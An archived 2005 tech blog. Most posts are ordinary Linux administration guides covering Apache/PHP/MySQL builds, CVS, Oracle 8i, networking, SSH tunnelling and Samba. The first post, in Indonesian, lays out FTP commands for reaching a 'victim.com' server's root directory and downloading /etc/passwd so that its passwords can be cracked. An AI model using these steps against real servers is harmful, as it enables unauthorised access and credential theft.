Learning Techno

hacking shell melalui FTP

2005-03-10T20:28:00.000-08:00

Berikut ini adalah cara menghack menggunakan Windows, yang digunakan untuk mendapatkan password file dari sebuah shell.Cara ini menggunakan ftp protocol.Kebanyakan paswordnya id sembunyikan /shadowed, tapi kamu masih bisa mendapatkannya dg meng-finger atau menebak passwordnya untuk loginnya.
Kamu dapat memulainya dg membuka/memasuki sebuah shell, dan kamu tidak perlu/tidak harus menggunakan/ berada didalam sebuah ftp server.berikut langkah langkahnya :

1.jalankan prompt
2.Tuliskan command untuk membuka dos command prompt
3.tuliskan ftp victim.com (nama server yg ingin di hacking !!)
4.Akan muncul prompt login.. tekan enter saja (tidak perlu menuliskan apa apa)
5.Akan muncul password login.. tekan saja enter...
6.sekarang ketiklah "quote user ftp" dan tekan enter
7.lalu ketik "quote cwd ~root" tekan enter
8.dan ketikan "quote pass ftp" tekan enter
Sekarang kamu sudah memiliki guest access dan dapat mendownload password file.. and have a fuckin' shit with that
9.ketiklah "cd etc" tekan enter.. untuk mendapatkan -etc directory- yg berisi file password
10.ketiklah "get passwd" untuk mendownload passw.file ke HD mu

Dengan demikian kita sudah memiliki password file dari victim dan kita dapat membukanya di C:\passwd dengan menggunakan notepad
Jika file tersebut di enkripsi.. kamu bisa meng-crack.. dan jika tidak dienkripsi..berarti anda berhasil

kamu dapat mencocokan antara user login dg passwordnya....

thanks

Apache/PHP/MySQL with SSL Installation

2005-03-08T04:30:00.000-08:00

# Move to /usr/local
cd /usr/local
# Get the following source:

ftp://ftp.openssl.org/source/openssl-0.9.7c.tar.gz
http://www.ibiblio.org/pub/mirrors/apache/httpd/httpd-2.0.48.tar.gz
http://www.linuxguruz.org/downloads/php-4.3.4.tar.gz
http://mysql.secsup.org/Downloads/MySQL-4.0/mysql-4.0.17.tar.gz

# Decompress the sources:
tar -xvzf openssl-0.9.7c.tar.gz
tar -xvzf httpd-2.0.48.tar.gz
tar -xvzf php-4.3.4.tar.gz
tar -xvzf mysql-4.0.17.tar.gz

cd ../mysql-4.0.17
./configure
make
make install
scripts/mysql_install_db

adduser mysql
# In the file /etc/login.access add this line:
-:mysql:ALL
# So the user mysql never actualy logs in

# For Slackware:
chown -R mysql.users /usr/local/var
# For Redhat:
chown -R mysql.mysql /usr/local/var

mysqld_safe --user=mysql &

# Hit
mysqladmin -u root password 'yourpasswordhere'

cd ../openssl-0.9.7c
sh config -fPIC
make
# If you get a "Not enough room for program headers" error here,
# install the LATEST version of binutils.

cd ../httpd-2.0.48
SSL_BASE=../openssl-0.9.7c ./configure --prefix=/usr/local/apache --enable-module=all --enable-ssl --enable-so
make

# Note: There is a Redhat bug that complains about mod_auth_dbm.so
# during the Apache `make` proccess. Adding the configuration
# switch --disable-module=auth_dbm to the end of the ./configure line
# will fix it.

# If you presently have a libphp4.so module you should make a backup:
cp /usr/local/apache/modules/libphp4.so /usr/local/apache/modules/libphp4.so.was

# If you have a file called /usr/local/apache/conf/httpd.conf already you
# should make a backup:
mv /usr/local/apache/conf/httpd.conf /usr/local/apache/conf/httpd.conf.was

# This way you'll get a fresh httpd.conf with all your Apache modules listed
# and 100% loadable.

# Don't worry if your web server is presently running. The httpd.conf file
# is only read by the httpd binary when starting the web server.

make install

# Now to create a "test certificate".
cd /usr/local/apache/conf/
openssl genrsa -des3 -out ca.key 1024
# Note: In order to go live, the "Common Name" has to match the server's
# host adress.
openssl req -new -x509 -days 365 -key ca.key -out ca.crt
openssl genrsa -des3 -out server.key 1024
openssl req -new -days 365 -key server.key -out server.crt

wget http://www.linuxguruz.com/downloads/sign.sh
chmod +x sign.sh
./sign.sh server.crt
chmod -x sign.sh
mkdir ssl.crt ssl.key
cp server.crt ssl.crt
cp server.key ssl.key

#
cd ../php-4.3.4
./configure --with-apxs2=/usr/local/apache/bin/apxs --with-config-file-path=/usr/local/apache/conf --enable-versioning --with-mysql=/usr/local --enable-ftp --enable-bcmath --disable-debug --enable-memory-limit=yes --enable-track-vars
make
make install

# Make sure you have, Uncomment (remove the #'s), Change or Create
# the following lines in the file /usr/local/apache/conf/httpd.conf

LoadModule php4_module libexec/libphp4.so

DirectoryIndex index.html index.php index.php3 index.phtml

# And for PHP 4.x, use:
#
AddType application/x-httpd-php .php .php3 .phtml
AddType application/x-httpd-php-source .phps

cp /usr/local/php-4.3.4/php.ini-dist /usr/local/apache/conf/php.ini

# Start Apache:
/usr/local/apache/bin/apachectl startssl

# Create a file in /usr/local/apache/htdocs called index.php
-html-
-head--title-PHP Test Page-/title--/head-
-body-
-? phpinfo(); ?-
-/body-
-/html-

# Point your Web Browser at:
http://localhost/index.php

Anyone who wishes to make additions or changes to this
PHP Tutorial email them to webmaster@linuxguruz.com

Apache/PHP/MySQL Installation

2005-03-08T04:25:00.001-08:00

Title: Apache/PHP/MySQL Installation
Contributor: yudhax (aka Ranman)
Last Update: Mart 08 22:24 EST 2005

# Move to /usr/local
cd /usr/local

# Get the following source:

http://www.ibiblio.org/pub/mirrors/apache/httpd/httpd-2.0.48.tar.gz
http://www.linuxguruz.org/downloads/php-4.3.4.tar.gz
http://mysql.secsup.org/Downloads/MySQL-3.23/mysql-3.23.55.tar.gz

# Decompress the sources:
tar -xvzf httpd-2.0.48.tar.gz
tar -xvzf php-4.3.4.tar.gz
tar -xvzf mysql-4.0.17.tar.gz

cd ../mysql-4.0.17
./configure
make
make install
scripts/mysql_install_db

adduser mysql
# In the file /etc/login.access add this line:
-:mysql:ALL
# So the user mysql never actualy logs in

# For Slackware:
chown -R mysql.users /usr/local/var
# For Redhat:
chown -R mysql.mysql /usr/local/var

mysqld_safe --user=mysql &
# Hit
mysqladmin -u root password 'yourpasswordhere'

cd ../httpd-2.0.48
./configure --prefix=/usr/local/apache --enable-module=all --enable-so
make

# Note: There is a Redhat bug that complains about mod_auth_dbm.so
# during the Apache `make` proccess. Adding the configuration
# switch --disable-module=auth_dbm to the end of the ./configure line
# will fix it.

# If you presently have a libphp4.so module you should make a backup:
cp /usr/local/apache/libexec/libphp4.so /usr/local/apache/libexec/libphp4.so.was

# If you have a file called /usr/local/apache/conf/httpd.conf already, you
# should make a backup:
mv /usr/local/apache/conf/httpd.conf /usr/local/apache/conf/httpd.conf.was

# This way you'll get a fresh httpd.conf with all your Apache modules listed
# and 100% loadable.

# Don't worry if your web server is presently running. The httpd.conf file
# is only read by the httpd binary when starting the web server.

make install

cd ../php-4.3.4
./configure --with-apxs2=/usr/local/apache/bin/apxs --with-config-file-path=/usr/local/apache/conf --enable-versioning --with-mysql=/usr/local --enable-ftp --with-gd --enable-bcmath --disable-debug --enable-memory-limit=yes --enable-track-vars
make
make install

# Make sure you have, Uncomment (remove the #'s), Change or Create
# the following lines in the file /usr/local/apache/conf/httpd.conf

LoadModule php4_module libexec/libphp4.so

DirectoryIndex index.html index.php index.php3 index.phtml

# And for PHP 4.x, use:
#
AddType application/x-httpd-php .php .php3 .phtml
AddType application/x-httpd-php-source .phps

cp /usr/local/php-4.3.4/php.ini-dist /usr/local/apache/conf/php.ini

# Start Apache:
/usr/local/apache/bin/apachectl start

# Create a file in /usr/local/apache/htdocs called index.php
head--title-PHP Test Page-/title--/head
body
? phpinfo(); ?
/body
/html

# Point your Web Browser at:
http://localhost/index.php

Anyone who wishes to make additions or changes to this
PHP Tutorial email them to webmaster@linuxguruz.org

Copyright (c) 1999, 2000, 2001, 2002, 2003 and 2004 by LinuxGuru

Apache/PHP/MySQL Installation

2005-03-08T04:25:00.000-08:00

Title: Apache/PHP/MySQL Installation
Contributor: yudhax (aka Ranman)
Last Update: Mart 08 22:24 EST 2005

# Move to /usr/local
cd /usr/local

# Get the following source:

http://www.ibiblio.org/pub/mirrors/apache/httpd/httpd-2.0.48.tar.gz
http://www.linuxguruz.org/downloads/php-4.3.4.tar.gz
http://mysql.secsup.org/Downloads/MySQL-3.23/mysql-3.23.55.tar.gz

# Decompress the sources:
tar -xvzf httpd-2.0.48.tar.gz
tar -xvzf php-4.3.4.tar.gz
tar -xvzf mysql-4.0.17.tar.gz

cd ../mysql-4.0.17
./configure
make
make install
scripts/mysql_install_db

adduser mysql
# In the file /etc/login.access add this line:
-:mysql:ALL
# So the user mysql never actualy logs in

# For Slackware:
chown -R mysql.users /usr/local/var
# For Redhat:
chown -R mysql.mysql /usr/local/var

mysqld_safe --user=mysql &
# Hit
mysqladmin -u root password 'yourpasswordhere'

cd ../httpd-2.0.48
./configure --prefix=/usr/local/apache --enable-module=all --enable-so
make

# Note: There is a Redhat bug that complains about mod_auth_dbm.so
# during the Apache `make` proccess. Adding the configuration
# switch --disable-module=auth_dbm to the end of the ./configure line
# will fix it.

# If you presently have a libphp4.so module you should make a backup:
cp /usr/local/apache/libexec/libphp4.so /usr/local/apache/libexec/libphp4.so.was

# If you have a file called /usr/local/apache/conf/httpd.conf already, you
# should make a backup:
mv /usr/local/apache/conf/httpd.conf /usr/local/apache/conf/httpd.conf.was

# This way you'll get a fresh httpd.conf with all your Apache modules listed
# and 100% loadable.

# Don't worry if your web server is presently running. The httpd.conf file
# is only read by the httpd binary when starting the web server.

make install

cd ../php-4.3.4
./configure --with-apxs2=/usr/local/apache/bin/apxs --with-config-file-path=/usr/local/apache/conf --enable-versioning --with-mysql=/usr/local --enable-ftp --with-gd --enable-bcmath --disable-debug --enable-memory-limit=yes --enable-track-vars
make
make install

# Make sure you have, Uncomment (remove the #'s), Change or Create
# the following lines in the file /usr/local/apache/conf/httpd.conf

LoadModule php4_module libexec/libphp4.so

DirectoryIndex index.html index.php index.php3 index.phtml

# And for PHP 4.x, use:
#
AddType application/x-httpd-php .php .php3 .phtml
AddType application/x-httpd-php-source .phps

cp /usr/local/php-4.3.4/php.ini-dist /usr/local/apache/conf/php.ini

# Start Apache:
/usr/local/apache/bin/apachectl start

# Create a file in /usr/local/apache/htdocs called index.php

PHP Test Page

# Point your Web Browser at:
http://localhost/index.php

Anyone who wishes to make additions or changes to this
PHP Tutorial email them to webmaster@linuxguruz.org

Copyright (c) 1999, 2000, 2001, 2002, 2003 and 2004 by LinuxGuru

Some notes on CVS

2005-03-08T04:20:00.000-08:00

Setup and run the CVS server

Look for cvs services listed in /etc/servics

# grep cvs /etc/services
cvspserver2401/tcp# CVS client/server operations
cvspserver2401/udp# CVS client/server operations
cvsup 5999/tcpCVSup# CVSup file transfer/John Polstra/FreeBSD
cvsup 5999/udpCVSup# CVSup file transfer/John Polstra/FreeBSD
#

Add cvs pserver to xinted

# cd /etc/xinetd.d/
# cat cvspserver
# service cvspserver
{
socket_type = stream
protocol = tcp
wait = no
user = root
passenv =
server = /usr/bin/cvs
server_args = --allow-root=/cvs pserver -f
}

# /sbin/service xinetd restart
Adding CVS users and CVS passwd file

Used this perl script to generate a password ( you can also use htpasswd )

$ cat passwd.pl

#!/usr/bin/perl -w
$saltchars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789./';
while (<>) {
chomp $_;
my ($salt) = substr($saltchars, rand(64), 1) . substr($saltchars, rand(64), 1);
my ($c) = crypt($_, $salt);
print "'$_' => '$c'\n";
}

Generate a password

$ ./passwd.pl
password
'password' => 'OKqq1ib8XEv2E'
$

Add the password into the password file

$ cd $CVSROOT/CVSROOT
$ cat passwd
cvs-user:OKqq1ib8XEv2E:
$

Connecting to the CVS server
Login from another machine like this

$ cvs -d :pserver:cvs-user@serverbox.your.domain.com:/cvs login
(Logging in to cvs-user@serverbox.your.domain.com)
CVS password:
$

Or like this

$setenv CVSROOT :pserver:cvs-user@serverbox.your.domain.com:/cvs
$cvs login

Fixing some common CVS glitches

Got the folowing error:

cvs co -r open-source-product-121-trial-build open-source-product-121
cvs server: cannot open /root/.cvsignore: Permission denied
cvs [server aborted]: can't chdir(/root): Permission denied

Fixed by :

$
#unset HOME
#/etc/rc.d/init.d/inet restart
#/sbin/service xinetd restart

Or by : ( not recommended )

# chmod a+w /root
# chmod a+x /root

Sticky problems

problem:

$ cvs commit -m "adding new version" foobar.c
cvs server: sticky tag 'RELEASE-CANDIDATE-1' for file 'foobar.c' is not a branch
cvs [server aborted]: correct above errors first!
$

fix using an update:

$ cvs update -A foobar.c
M foobar.c
$
$ cvs commit -m "adding new version" foobar.c
Checking in package;
/your/open/source/program/foobar.c,v <-- foobar.c
new revision: 1.2; previous revision: 1.1
done
$

On HP-UX rsh is not the remoteshell remsh is the remote shell,

So you might need to add:

$ setenv CVS_RSH /bin/remsh

Some common CVS commands

$ cd /the/downlaoded/open-source-product/121/source/base/
$ cvs import -m "open-source-product 1.2.1 source import" \
open-source-product-121 FOOBAR open-source-product121
$ cvs checkout open-source-product-121
U open-source-product-121/open-source-product/Makefile.in
....
$ cvs checkout open-source-product-121
$ cvs commit -m "Added FOOBAR specific changes"
Checking in open-source-product/nsprpub/configure;
/cvs/open-source-product-121/open-source-product/nsprpub/configure,v <-- configure
new revision: 1.2; previous revision: 1.1
done
$ cvs -q tag open-source-product-121-trial-build
$ cvs checkout -r open-source-product-121-trial-build open-source-product-121
$ mkdir build
$ cvs add build/
$ cvs -q tag open-source-product-121-trial-build
$ cvs tag -R open-source-product-121-trial-build
$ cvs co -r open-source-product-121-trial-build open-source-product-121

Sample Code - Using shared libs on UNIX

2005-03-08T04:02:00.000-08:00

Sample C code for :

1. Creating a shared library
2. Runtime loading of a shared library
3. Calling a method from the loaded library

On GNU/Linux :

share.c

/*
* sample code for creating a shared library on GNU/Linux
*
* cc -fPIC -c share.c -o share.o
* ld -shared share.o -o share.sl
*
* kishan@hackorama.com ( www.hackorama.com ) Feb 2001
*
*/

#include

void
share( int value )
{
fprintf( stdout, "\nthe answer is %d\n", value );
}

------------ cut ----------

#cc -fPIC -c share.c -o share.o
#ld -shared share.o -o share.sl

main.c [ using dlopen(), dlsym() ]

coding ---

/*
* sample code for loading, calling a method from
* and unloading a shared library on GNU/Linux
*
* cc main.c -o main -ldl
*
* If using c++ compiler the symbol names will be mangled
* So a method called "share" will be "share__Fi" in the
* shared library, Please do a "nm share.sl" to find the
* mangled symbol for the method.
*
* kishan@hackorama.com ( www.hackorama.com ) Feb 2001
*
*/

#include
#include

int
main( void )
{
const char *sh_lib = "share.sl" ;
const char *method = "share";

void (*fp) (int) = NULL ;
void *handle = dlopen( sh_lib , RTLD_NOW );

if( handle == NULL ){
fprintf( stderr, "\nfailed loading %s\n", sh_lib );
exit(1);
}else{
fp = ( void (*)(int) )dlsym( handle, method );
if( fp == NULL )
fprintf( stderr, "\nfailed getting method %s\n", method);
else
fp( 42 );
if ( dlclose(handle) != 0 )
fprintf( stderr, "\nfailed unloading %s\n", sh_lib );
}

exit(0);
}

----------------------- cut _------------------

cc main.c -o main -ldl

On HP-UX :

share.c

coding ---

/*
* sample code for creating a shared library on HP-UX
*
* cc +z -c share.c -o share.o
* ld -b share.o -o share.sl
*
* kishan@hackorama.com ( www.hackorama.com ) Feb 2001
*
*/

#include

void
share( int value )
{
fprintf( stdout, "\n\nthe answer is %d\n\n", value );
}

------------------------- cut -------------------------

cc +z -c share.c -o share.o
ld -b share.o -o share.sl
main.c [ using shl_load(), shl_findsym() ]

coding ---

/*
* sample code for loading , calling a method from
* and unloading a shared library on HP-UX
*
* cc main.c -o main
*
* If using a c++ compiler the symbol names will be mangled
* So a method called "share" will be "share__Fi" in the
* shared library, Please do a "nm share.sl" to find the
* mangled symbol for the method.
*
* kishan@hackorama.com ( www.hackorama.com ) Feb 2001
*
*/

#include
#include

int
main( void )
{
const char* sh_lib = "share.sl";
const char* method = "share";

void (*fp) ( int value ) = NULL ;
shl_t handle = shl_load( sh_lib , BIND_IMMEDIATE , NULL );

if( handle == NULL ){
fprintf( stderr, "\nfailed loading %s\n", sh_lib);
exit(1);
}else{
shl_findsym( &handle, method, TYPE_UNDEFINED, &fp );
if( fp == NULL )
fprintf( stderr, "\nfailed getting method %s\n", method);
else
fp( 42 );

if ( shl_unload( handle ) != 0 )
fprintf( stderr, "\nfailed unloading %s\n", sh_lib);
}

exit(0);
}

------------------------- cut ----------------------

cc main.c -o main

The linux sample code should work for other UNIX flavours, which use dlopen()/dlsym(). Only HP-UX uses shl_load()/shl_findsym(). Please look at the man pages of cc and ld for the correct flags to be used for the particular version of UNIX.

Oracle 8i on Linux

2005-03-08T04:00:00.000-08:00

This is a step by step guide to installing Oracle8i on Linux. The installation was successfully tested on Suse 6.4 , Redhat 6.2 and Caldera openLinux 2.4 using Oracle 8i Enterprise Edition Release 2 (8.1.6) for Linux (Intel) circa October 2000.

1.Installtion
2.Notes
3.Trouble Shooting

1.Installation

Download Java 1.1.6 ( JRE ) for Linux from www.java.sun.com/linux or from blackdown.org and Oracle 8i from oracle.com If you have the Oracle 8i CD download only the JRE.

[download the files to some directory like /tmp ]
$cd /tmp
$ls *.gz
jre_1.1.6-v5-glibc-x86.tar.gz
oracle8161_tar.gz

[ become root ]
$su

[ set up and install the jre ]
#cp /tmp/jre_1.1.6-v5-glibc-x86.tar.gz /usr/local/lib
#cd /usr/local/lib
#tar -xzvf jre_1.1.6-v5-glibc-x86.tar.gz
#ln -s /usr/local/lib/jre116_v5 /usr/local/lib/jre
#export PATH=$PATH:/usr/local/jre/bin

[ create user groups ]
#/usr/sbin/groupadd -g 111 oinstall
#/usr/sbin/groupadd -g 112 dba

[ create auser named oracle ]
#mkdir /home/oracle
#/usr/sbin/useradd -g dba -d /home/oracle oracle
#/usr/sbin/usermod -g dba -G oainstall oracle
#passwd oracle
#chown oracle /home/oracle
#chgrp dba /home/oracle

[ make some directories required during installtion ]
#mkdir -p /usr/local/oracle/8i && cd /usr/local/oracle/8i
#mkdir -p /usr/local/oracle/8i && cd /usr/local/oracle/8i
#mkdir {u01,u02,u03,u04}
#chown oracle:oinstall {u01,u02,u03,u04}

[ become user oracle ]
#su oracle
$cd
$pwd
/home/oracle
$

[ Create/Edit the file named /home/oracle/.bashrc
with the following contents : [ SEE NOTE 2]

ORACLE_HOME=/usr/local/oracle/8i/u01/app/oracle/product/8.1.5
ORACLE_BASE=/usr/local/oracle/8i/u01/app/oracle
export ORACLE_HOME ORACLE_BASE
NLS_LANG='english_united kingdom.we8iso8859p1'
ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data
ORACLE_TERM=vt100
LD_LIBRARY_PATH=$ORACLE_HOME/lib
PATH=$PATH:$ORACLE_HOME/bin:/usr/local/jre/bin
export NLS_LANG ORA_NLS33 PATH LD_LIBRARY_PATH

$vi .bashrc
$source .bashrc

[ NO CD - unzip and extract the downloaded files ]
$gunzip /tmp/oracle8161_tar.gz
$tar -xvf /tmp/oracle8161_tar
$cd /tmp/Oracle8iR2/install/linux

[ WITH CD - If not mounted mount the CD ] [ SEE NOTE 1 ]
#su
#mount -t iso9660 /dev/hdc /cdrom
#exit
#su oracle
$cd /cdrom/install/linux

[ start installation ]
$./runInstaller

During installation the installation program will prompt you a couple of times to run certain commands as root from a shell. It will also ask you to create an SID at the end of the installation.

Post Install:

$svrmgrl
>connect internal
>startup

$export ORACLE_SID=your_sid_name
$sqlplus scott/tiger
SQL>
SQl>select ename from emp;

2.Notes
1. Mounting CD

The mount command might be little different on diferent machines the third parameter the device file for CDROM [ /dev/hdc ] may not be the same on all machines. Please contact your friendly sysadmin for help.

Or if you have an X desktop environment like Gnome or KDE you can click on the CDROM icon it might mount the CDROM and will open the CDROM contents in a file explorer.

Some Linux distributions ( like Caldera open Linux ) will have the CD auto mounted at /auto/cdrom. in that case you just go to that directory to access the installation files you dont have to mount the CD.

2. Adding the .profile/.login/.bashrc

Usually the default shell for new user accounts on Linux is bash. So the file to add Oracle environment variables is usually .bashrc in the home directory /home/oracle. But if you are running another shell please contact your friendly sysadmin to find out which file to edit.

If you are not familiar with vi , please use any of the notepad like editors gedit,kedit,nedit .
3.Troubleshooting
1. Make sure you have set the Oracle environment variables correctly.

$su oracle
$cd
$pwd
/home/oracle
$source .bashrc
$env | grep -E 'ORACLE|NLS|LD'
NLS_LANG=english_united kingdom.we8iso8859p1
LD_LIBRARY_PATH=/usr/local/oracle/8i/u01/app/oracle/product/8.1.5/lib
ORACLE_BASE=/usr/local/oracle/8i/u01/app/oracle
ORA_NLS33=/usr/local/oracle/8i/u01/app/oracle/product/8.1.5/ocommon/nls/admin/data
ORACLE_HOME=/usr/local/oracle/8i/u01/app/oracle/product/8.1.5
$

Make sure the env command shows the above output, otherwise make sure you edited the /home/orcle/.bashrc file correctly.

2. Stale files from an aborted/failed installation

Sometimes the Oracle Universal Installer leaves behind stale files from an earlier failed installation as a different user.

One of the files left behind is /etc/oraInst.loc

#su
#cat /etc/oraInst.loc
inventory_loc=/home/user_name/oraInventory
inst_group=dba
#
[ where user_name is the user account from which the last failed installation was attempted ]

If you have this file hanging around you might get an error message saying no permissions to write /home/user_name/oraInventory . In that case become root and delete /etc/oraInst.loc file, and continue installation as user oracle.

SETTING UP NETWORK ON LINUX [ for DSL / LAN ]

2005-03-08T03:59:00.000-08:00

This is a MINI HOW-TO on setting up the network configurations to connect yout Linux box on to a DSL network. It also applies to setting up your machine on a LAN.

The configuration instructionsa are specific to Redhat Linux distro. There might be slight difference in the configuration files with other distros.

Get the IP Addresses

All you need from your DSL provider or your LAN sys-admin is the following set of IP addreses.

1. Your IP address

111.111.111.111

2. The Gateway IP address

222.222.222.222

3. The netmask

255.255.255.333

4. The DNS ( Primary and Secondary )

444.444.444.444
555.555.555.555

NOTE: The IP addresses above are just place holders please replace with your actual IP addresses.

1.Set up your IP ( 111.111.111.111 )

* add the following line to /etc/hosts
111.111.111 hostname

* Eg: If your machine was called kahlua:

$cat /etc/hosts
127.0.0.1 localhost localhost.localdomain
111.111.111.111 kahlua

2.Set up Gateway ( 222.222.222.222 )

* Edit the /etc/sysconfig/network file with:
GATEWAY="222.222.222.222"

* Eg: If your machine was called kahlua:

$cat /etc/sysconfig/network
NETWORKING=yes
FORWARD_IPV4="yes"
HOSTNAME="kahlua"
GATEWAY="222.222.222.222"
GATEWAYDEV="eth0"

3. Set up the netmask ( 255.255.255.333 ) and IP ( 111.111.111.111 )

* Edit /etc/sysconfig/network-scripts/ifcfg-eth0 with:
IPADDR="111.111.111.111"
NETMASK="255.255.255.333"

* Eg: If your machine has IP 111.111.111.111 :

$ cat /etc/sysconfig/network-scripts/ifcfg-eth0
DEVICE="eth0"
IPADDR="111.111.111.111"
NETMASK="255.255.255.333"
ONBOOT="yes"
BOOTPROTO="none"
IPXNETNUM_802_2=""
IPXPRIMARY_802_2="no"
IPXACTIVE_802_2="no"
IPXNETNUM_802_3=""
IPXPRIMARY_802_3="no"
IPXACTIVE_802_3="no"
IPXNETNUM_ETHERII=""
IPXPRIMARY_ETHERII="no"
IPXACTIVE_ETHERII="no"
IPXNETNUM_SNAP=""
IPXPRIMARY_SNAP="no"
IPXACTIVE_SNAP="no"

4. Set up the DNS ( 444.444.444.444 and 555.555.555 )

* Edit /etc/resolv.conf and add:
nameserver 444.444.444.444
nameserver 555.555.555.555

* Eg: If your machine was called kahlua
and your providers domain is called dslinc.net :

$ cat /etc/resolv.conf
domain dslinc.net
search kahlua
nameserver 444.444.444.444
nameserver 555.555.555.555

Now you should be all set. Just ping any server on the net and verify if everything works fine.

Fore more information, please read the how-to docs NET-3-HOWTO / NET3-4-HOWTO in your /usr/doc/HOWTO ( normal path for Redhat distros ). Or search the newsgroup postings or linux archives.

Installing ssh and sshd

2005-03-08T03:42:00.000-08:00

Title: Installing ssh and sshd
Contributor: yudhax (neorganicz)
Last Update: Saturday Mart 20 01:30 EDT 2005

cd /usr/local

Get ftp://ftp.cis.fed.gov/pub/ssh/ssh-2.4.0.tar.gz

wget ftp://ftp.cis.fed.gov/pub/ssh/ssh-2.4.0.tar.gz
tar -xzvf ssh-2.4.0.tar.gz
cd ssh-2.4~.0
./configure
make
make install

# In /etc/rc.d/rc.local:
# SSH Startup
echo Starting SSH Daemon
/usr/local/sbin/sshd

# Start sshd for the first time:
/usr/local/sbin/sshd

# Your done! now just:
ssh machine_name

SSH Tunnell using POP3 for IMAP Mail

2005-03-08T03:40:00.000-08:00

Who wants to read this
If you have a POP mail account on a remote server, provided by your ISP/work/school and wants to access your mails from your home/local machine through a secure channel.

Please note I will be reffering to POP3 as just POP throughout this article.

Why Secure POP
The normal POP communcations sends everything in clear text, including your mail account passwords. We need to use a secure channel, where everything will be encrypted between your local machine and the remote mail server. The rational is analogous to the use of encrypted HTTPS versus the normal HTTP communication when we access secure webservices.

Check for IMAP with SSL support
IMAP with SSL encrypts the mail communications the same way HTTPS encrypts the website communications. Sadly not all mail servers support this. ( My ISP replied to me "at this time we do not provide SSL mail due to stability issues in current implementations" )

If you have SSL mail, all you need to do is configure your mail tool to use SSL. All the popular mail clients like Mozilla/Netscape Mail, Eudora , Outlook Express etc supports SSL. The SSL option may not be On by default so please edit the Configuration/Settings of your mail client to use SSL.

On Mozilla 0.95/Netscape6.x Mail :

Select Menu:
Mail -> Mail & Newsgroups Account Settings
From the popup Dialog:
Select "Server Settings", Check "Use Secure connection (SSL) "
Select "Outgoing server (SMTP)" , Check "Always" for "Use secure connection ( SSL)"

If your remote server supports SSH
If you dont know much about SSH, please google the web for more information and then download and install SSH on your local machine. Most of the Linux machines should have it already installed.

If you already use SSH ( like as a secure replacement for telnet/ftp ) and just want to know about POP through SSH then jump ahead to the SSH tunnelling section.

The following instructions are for Linux/Unix. But the concept is the same for other platforms as well. Instead of the command line invocations, you might use a GUI application.

Run ssh with the hostname or IP address of the mail server. If you get the following response you cannot use SSH.

$ ssh mail.remoteserver
ssh: connect to address xxx.xxx.xxx.xxx port 22: Connection refused
$

If you can connect to the remote server using SSH, then we can setup a secure tunnell through SSH for your POP communications. The tunnell connects a port on your local machine ( say 1234 ) to the POP3 port ( port 110 ) of your remote server.

$ ssh -P -f -L 1234:remoteserver:110 user@remoteserver sleep 25

-L specifies the port forwarding 1234 on local machine to 110 od remoteserver.
-f tells SSH to fork out and run in the background.
-P option allows us ti open a non privilaged port - like 1234 - which does not require root access ( ports higher than 1024 ).

"sleep 25" is the command to execute at the remote server so as long as the command is executing at the server the tunnell will be kept open. In the example the connection will be open for 25 seconds, you can specify any duration to sleep.

This is called port forwarding in technical jargon, which means the local port on your machine will just forward any communication coming there to the POP server port. So in the mail tool when we configure the mail server name instead of the remoteserver:110 we will say localhost:12345

Now you have the POP tunnell yo get your mail to your local machine. Now if you want to send a mail for your mail through the SMTP server on the remote machine you can setup another secure tunnell to the SMTP port ( port 25 ) of the remote mail server as follows.

$ ssh -P -f -L 1235:remoteserver.net:25
user@remoteserver sleep 25
Test the tunnell
Once you have setup the the tunnel as explained above, test whether they are connecting correctly by telnetting to the tunnell ports.

First test the incoming POP tunnel. After connecting if you see the name of your remote server then your tunnell is working. Press the escape charecter "ctrl+]" to get to telnet prompt and then type "close" to exit.

$ telnet localhost 1234
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
+OK QPOP (version 3.1.2) at remoteserver.net starting.
^]

telnet> close
Connection closed.
$

Now check the same for the outbound tunnell. Type "quit" to close connection.

$ telnet localhost 1235
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
220 remoteserver.net ESMTP Sendmail 8.8.6/8.8.2; Thu, 6 Dec 2001 22:24:54 -0800

quit
Connection closed by foreign host.
$
Mail tool configuration
In the settings/configuration for incoming POP server pleasee specify localhost as the server and 1234 as the port. For outgoing SMTP mail server please specify localhost and 4321 as server and the port. And make sure you enable the tunnels before getting sending the mail.

One click tunnelling
I have put the above commands into shellscripts for convenience. And to make it even easier I have created a desktop shortcut on my linux workstation, which will bring up the scripts inside a small xterm window. So whenever I need to get or send mail, I just click on the desktop icon and type in the password/passphrase on the xterm that pops up with the tunnell script.

These are the scripts I use , you can either use these or create your own which suits your needs.

$cat getmail.sh

#/bin/sh
DELAY=300
ps -ef | grep -i ssh | grep 1234 | grep -v grep | grep -v sshd
echo ""
ssh -P -f -L 1234:mail.foo.net:110 user@foo.net sleep $DELAY
sleep $DELAY
$

$cat putmail.sh

#/bin/sh
DELAY=300 ps -ef | grep -i ssh | grep 1235 | grep -v grep | grep -v sshd
echo ""

ssh -P -f -L 1235:mail.foo.net:25 user@foo.net sleep $DELAY
sleep $DELAY
$

$cat tunnel.sh

#/bin/sh
xterm -geometry 60x5+60+10 -bg red -fg white -T
'local:1234]==[110:mail.foo.net]' -e /home/foo/bin/getmail.sh &
xterm -geometry 60x5+60+110 -bg green -fg black -T
'local:4321]==[ 25:mail.foo.net]' -e /home/foo/bin/putmail.sh &
$

SAMBA - Windows Linux file Sharing Notes

2005-03-08T03:04:00.000-08:00

Simple SAMBA on LINUX Sharing

Some basic notes on using SAMBA on a home network with linux and windows machines, like my home network setup.
Running SAMBA on a Linux machine

To start, stop or restart samba,

/etc/init.d/smd start
/etc/init.d/smd stop
/etc/init.d/smd restart

All options for the SAMBA goes to /etc/samba/smb.conf This is my smb.conf

Notable changes I made are:

My linux machine is a gateway server with two ethernet interfaces eth0 and eth1. For security reasons I set up SAMBA to run only on the internal interface

interfaces = 192.168.0.1/24 127.0.0.1/24
bind interfaces only = Yes

Also set hosts allow to only allow internal and localhoist

hosts allow = 127. 192.168.0.
hosts deny = *
SAMBA authentification

For the file access permissions for the shares to work, you have to set up the SAMBA username/password by running smbpasswd program on the linux box.

Then on the Windows machine login with the username/password created above with smbpasswd. Otherwise the file sharing will not work.
SAMBA Linux to Windows Sharing

Set up the shares in /etc/samba/smb.conf as follows

[musak]
comment = music from linux boxen
path = /var/stuff/media/musak
read only = Yes

On the windows machine access it as \\192.168.0.1\musak where 192.168.0.1 is the IP address of the linux machine.

If you want to share CD/DVD drive

[dvd]
comment = dvd drive on linux boxen
writable = No
locking = No
path = /mnt/cdrom2
